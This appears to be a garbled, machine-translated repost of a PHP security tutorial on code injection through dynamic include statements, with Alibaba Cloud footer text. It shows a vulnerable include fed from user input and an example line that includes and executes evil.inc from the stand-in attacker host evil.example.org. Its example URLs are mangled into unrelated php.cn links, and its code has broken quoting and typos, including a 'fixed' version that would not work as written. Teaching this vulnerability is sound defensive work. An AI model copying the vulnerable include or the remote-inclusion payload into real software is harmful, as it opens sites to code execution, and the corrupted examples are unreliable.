PHP Security-code injection

Source: Internet
Author: User



Code injection

A particularly dangerous situation is when you try to use contaminated data as a leading part of a dynamic inclusion:

<?php   include "{$_get[' path ']}/header.inc";   ? >


In this scenario, the attacker can manipulate not just the file name, but also the contained resources. Because PHP does not only contain files by default, it can also contain the following resources (controlled by Allow_url_fopen in the configuration file):

<?php   include ' http://www.google.com/';   ? >


The include statement will include the http://www.php.cn/Web page source code as a local file. Although the above example is harmless, imagine if the source code returned by Google contains PHP code. This will cause the PHP code contained in it to be parsed and executed. This is an opportunity for attackers to release malicious code to destroy your security system.

Imagine that the value of path points to a resource under the attacker's control:

http://www.php.cn/... e.org%2fevil.inc%3f

In the example above, the value of path is URL-encoded and the original value is as follows:

http://www.php.cn/

This causes the include statement to contain and execute the script selected by the attacker (Evil.inc), while the original file name/header.inc is considered a request string:

  <?php   include "Http://evil.example.org/evil.inc?/header.inc";   ? >


This avoids the need to guess the remaining directory and file name (/HEADER.ONC) and establish the same path and file name on the evil.example.org. Conversely, in the case where the specific file name of the attacked Web site is masked, he just has to make sure that the code he wants to execute is evil.inc in the output.

This is as dangerous as allowing an attacker to modify PHP code directly on your website. Fortunately, filtering the data before the include and require statements prevents this from happening:

<?php   $clean = Array ();   /* $_get[' path '] is filtered and stored in $clean [' Path ']. */   include ' {$clean [' path ']}/header.inc ';   ? >

The above is the PHP security-code injection content, more relevant content please pay attention to topic.alibabacloud.com (www.php.cn)!

  • Contact Us

    The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

    If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

    A Free Trial That Lets You Build Big!

    Start building with 50+ products and up to 12 months usage for Elastic Compute Service

    • Sales Support

      1 on 1 presale consultation

    • After-Sales Support

      24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.